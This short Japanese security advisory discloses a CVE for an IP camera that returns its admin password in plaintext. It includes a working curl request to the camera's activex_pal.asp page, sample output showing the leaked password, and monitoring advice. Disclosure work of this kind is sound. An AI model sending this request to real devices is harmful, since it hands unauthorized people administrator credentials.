
責任ある開示に従い、公式のCVEが2件割り当てられました。
| CVE | CVSS v3.1 | スコア | CWE | タイプ |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | 平文パスワードの露出 |
認証を必要とせず、ローカルの任意のユーザーが管理者パスワードを平文で取得できます。
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
管理者パスワードは、レスポンス本文内で平文のまま返されます。
activex_pal.asp および mblogin.asp への不審なアクセスを監視する。このリポジトリは、教育および正規のセキュリティ研究のみを目的としています。著者はいかなる誤用についても責任を負いません。デバイスをテストする前に、必ず明示的な許可を取得してください。